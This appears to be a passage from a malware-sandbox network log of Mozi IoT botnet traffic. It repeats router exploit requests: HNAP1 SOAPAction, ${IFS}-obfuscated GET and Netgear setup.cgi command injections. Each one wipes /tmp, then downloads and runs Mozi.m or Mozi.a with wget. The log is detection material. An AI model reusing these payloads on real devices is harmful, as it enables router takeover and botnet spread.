Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 104.124.230.135:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 179.40.62.87:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 204.232.228.51:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 45.148.37.237:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 123.110.194.55:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 154.3.84.96:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 185.36.171.129:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 166.88.13.234:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 